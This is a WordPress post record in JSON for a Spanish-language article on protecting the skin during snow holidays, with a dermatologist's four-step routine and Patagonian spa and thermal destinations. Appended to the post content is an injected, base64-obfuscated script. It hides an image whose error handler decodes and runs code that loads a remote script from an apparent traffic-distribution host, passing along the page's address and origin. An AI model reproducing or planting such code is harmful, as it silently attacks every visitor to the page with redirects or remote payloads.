{"id":9720,"date":"2025-06-30T11:33:40","date_gmt":"2025-06-30T14:33:40","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9720"},"modified":"2025-08-13T15:26:44","modified_gmt":"2025-08-13T18:26:44","slug":"vacaciones-de-invierno-en-la-nieve","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9720","title":{"rendered":"Vacaciones de invierno en la nieve"},"content":{"rendered":"\n<p class=\"has-white-color has-text-color has-background has-link-color wp-elements-14a8cb54d15449a88dd56cd5208c8bd4\" style=\"background-color:#4f5050\"><strong><em>La piel tambi\u00e9n viaja: llev\u00e1 estos cuidados en tu valija<\/em><\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/estetica-1.jpg\"><img decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/estetica-1-768x1024.jpg\" alt=\"\" class=\"wp-image-9722\" style=\"width:259px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/estetica-1-768x1024.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/estetica-1-225x300.jpg 225w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/estetica-1-696x928.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/estetica-1-315x420.jpg 315w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/estetica-1-320x427.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/estetica-1-480x640.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/estetica-1-800x1067.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/estetica-1.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Con el comienzo de las vacaciones de invierno y la apertura de la temporada de nieve en los principales destinos tur\u00edsticos, miles de viajeros ya organizan sus escapadas a la monta\u00f1a en busca de aventura, descanso y aire puro. Pero adem\u00e1s del abrigo y el equipo adecuado, hay algo que no puede faltar en la valija: los productos para el cuidado de la piel. Porque no solo hay que prepararse para disfrutar la nieve, sino tambi\u00e9n pensar en la vuelta y en c\u00f3mo recuperarse despu\u00e9s de la exposici\u00f3n al fr\u00edo y al sol de monta\u00f1a. Enterate todo lo que aconsejan los especialistas para protegerla antes, durante y despu\u00e9s del viaje.<\/p>\n\n\n\n<p>\u00abCuidar la piel del fr\u00edo si vas a la nieve es fundamental para evitar que se reseque o aparezcan manchas\u00bb, explica la m\u00e9dica dermat\u00f3loga Karina Saizar MP. 114685, quien alerta sobre los riesgos invisibles del clima invernal. \u00abDebido a la altura, la radiaci\u00f3n solar aumenta, por eso las quemaduras provocadas en la nieve suelen ser m\u00e1s graves que las del verano\u00bb, se\u00f1ala.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"457\" height=\"694\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg\" alt=\"\" class=\"wp-image-9688\" style=\"width:265px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg 457w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-198x300.jpeg 198w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-277x420.jpeg 277w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-320x486.jpeg 320w\" sizes=\"(max-width: 457px) 100vw, 457px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup><mark class=\"has-inline-color has-vivid-green-cyan-color\">Publicidad:<\/mark><\/sup><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>La nieve refleja hasta el 80% de los rayos UV, lo que multiplica el impacto del sol en la piel. Por eso, incluso en d\u00edas nublados, el uso de protector solar es obligatorio.<\/p>\n\n\n\n<p>La especialista recomienda cuatro pasos esenciales para proteger la piel durante una estad\u00eda en la nieve:<\/p>\n\n\n\n<p>1. Hidrataci\u00f3n previa: antes de salir al exterior, es clave aplicar una crema hidratante adecuada para el rostro. Este primer paso prepara la piel frente al fr\u00edo y evita la resequedad. Es importante no olvidar zonas sensibles como los p\u00e1rpados y los labios.<\/p>\n\n\n\n<p>2. Protecci\u00f3n solar SPF 50+:&nbsp; La nieve refleja gran parte de la radiaci\u00f3n solar, lo que intensifica su efecto sobre la piel. Por eso, una vez hidratada, se debe aplicar un fotoprotector de amplio espectro con un factor de protecci\u00f3n solar (SPF) 50+ como m\u00ednimo. Este debe reaplicarse cada dos horas, especialmente si el rostro entra en contacto con la nieve o el agua. Llevar una protecci\u00f3n solar a mano que permita reforzar la aplicaci\u00f3n en zonas delicadas como nariz, p\u00f3mulos y contorno de ojos.<\/p>\n\n\n\n<p>3. Cuidado de labios y manos:&nbsp; zonas como los labios y las manos son especialmente vulnerables. Los labios necesitan un protector solar espec\u00edfico, con textura m\u00e1s grasa, y deben rehidratarse con frecuencia. Las manos, aunque protegidas con guantes, tambi\u00e9n requieren hidrataci\u00f3n regular para prevenir grietas y saba\u00f1ones.<\/p>\n\n\n\n<p>4. Reparaci\u00f3n post actividad: al final del d\u00eda, es importante limpiar bien la piel y aplicar productos calmantes como gel de aloe vera, seguidos de agentes reparadores como aceite de rosa mosqueta o manteca de karit\u00e9. Esto ayuda a restaurar la barrera cut\u00e1nea tras la exposici\u00f3n al fr\u00edo y la radiaci\u00f3n.<\/p>\n\n\n\n<p>Cuidar la piel en la nieve no solo es una cuesti\u00f3n est\u00e9tica, sino una medida preventiva para evitar da\u00f1os a corto y largo plazo. Una rutina adecuada puede marcar la diferencia entre disfrutar el invierno y padecer sus consecuencias. \u00abLa piel tiene memoria. Las quemaduras de hoy pueden pasarnos factura en el futuro\u00bb, advierte la dermat\u00f3loga. Por eso, no importa si vas a esquiar, hacer snowboard o simplemente jugar en la nieve: la prevenci\u00f3n es la mejor aliada.<\/p>\n\n\n\n<p>Consultada sobre cu\u00e1les son los m\u00e9todos m\u00e1s utilizados por los pacientes luego de su estad\u00eda en la nieve, Saizar coment\u00f3 \u201cLos tratamientos m\u00e1s frecuentes en consultorio incluyen la hidrataci\u00f3n profunda y la restauraci\u00f3n celular, que se logran mediante t\u00e9cnicas como la mesoterapia o el microneedling. Estos procedimientos permiten introducir de forma sencilla en la piel activos como \u00e1cido hialur\u00f3nico, oligoelementos, antioxidantes, vitaminas, polinucle\u00f3tidos y exosomas, productos que hoy son furor en esta \u00e9poca del a\u00f1o\u201d, explic\u00f3.<\/p>\n\n\n\n<p>En nuestro pa\u00eds uno de los centros de esqu\u00ed m\u00e1s famosos (Cerro Catedral), cuenta con spas de alta gama y ofrece tratamientos con ingredientes naturales de la Patagonia: rosa mosqueta (rica en vitamina C), cal\u00e9ndula, lavanda y aceites esenciales andinos. Tambi\u00e9n faciales hidratantes post-nieve.<\/p>\n\n\n\n<p>Algunos hoteles tienen circuitos de agua, saunas y ba\u00f1os de vapor que ayudan a recuperar la humedad perdida por el fr\u00edo.&nbsp;<\/p>\n\n\n\n<p>En Villa La Angostura (Neuqu\u00e9n), cerca del centro de esqu\u00ed Cerro Bayo, es posible disfrutar de una experiencia m\u00e1s boutique, ideal para descansar y cuidarse. Adem\u00e1s de disfrutar de spas con vistas al lago y la monta\u00f1a, que ofrecen masajes hidratantes y faciales. Se suman productos cosm\u00e9ticos naturales de la regi\u00f3n y por supuesto un ambiente muy tranquilo, ideal para el descanso de la piel y el cuerpo.&nbsp;<\/p>\n\n\n\n<p>En San Mart\u00edn de los Andes, hogar del centro de esqu\u00ed Chapelco y uno de los destinos m\u00e1s encantadores de la Patagonia, es posible disfrutar de spas inmersos en plena naturaleza. Estos espacios ofrecen tratamientos detox e hidratantes, especialmente dise\u00f1ados para recuperar la piel despu\u00e9s de la exposici\u00f3n al fr\u00edo y la nieve. A ello se suman terapias con fango termal, masajes con piedras calientes, circuitos h\u00eddricos y el uso de aceites naturales aut\u00f3ctonos que revitalizan cuerpo y mente.<\/p>\n\n\n\n<p>Otra opci\u00f3n son las termas de Copahue (Neuqu\u00e9n):&nbsp; un destino de aguas termales ubicado en un entorno volc\u00e1nico. Aunque es m\u00e1s buscado durante el verano, durante algunos meses de oto\u00f1o e invierno se puede acceder con gu\u00eda. El lugar es famoso por su barro volc\u00e1nico con propiedades dermatol\u00f3gicas. Usado para tratar psoriasis, dermatitis y piel reseca.<\/p>\n\n\n\n<p>Este invierno, eleg\u00ed destinos que no solo te llenen de paisajes inolvidables, sino tambi\u00e9n de bienestar. La nieve y el fr\u00edo pueden ser aliados del descanso si cuidas tu piel como parte del viaje. Porque unas buenas vacaciones empiezan cuando cuerpo, mente y piel se sienten en equilibrio.<\/p>\n\n\n\n<p>Prensa y Difusi\u00f3n<\/p>\n\n\n\n<p>Cristela Cicar\u00e9<\/p>\n\n\n\n<p>@cristelacicare @prensack<\/p>\n<p>\u00a0<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La piel tambi\u00e9n viaja: llev\u00e1 estos cuidados en tu valija Con el comienzo de las vacaciones de invierno y la apertura de la temporada de nieve en los principales destinos tur\u00edsticos, miles de viajeros ya organizan sus escapadas a la monta\u00f1a en busca de aventura, descanso y aire puro. Pero adem\u00e1s del abrigo y el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9724,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,31,29],"tags":[],"class_list":["post-9720","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina","category-colaboradores","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9720","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9720"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9720\/revisions"}],"predecessor-version":[{"id":9898,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9720\/revisions\/9898"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9724"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9720"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9720"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9720"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}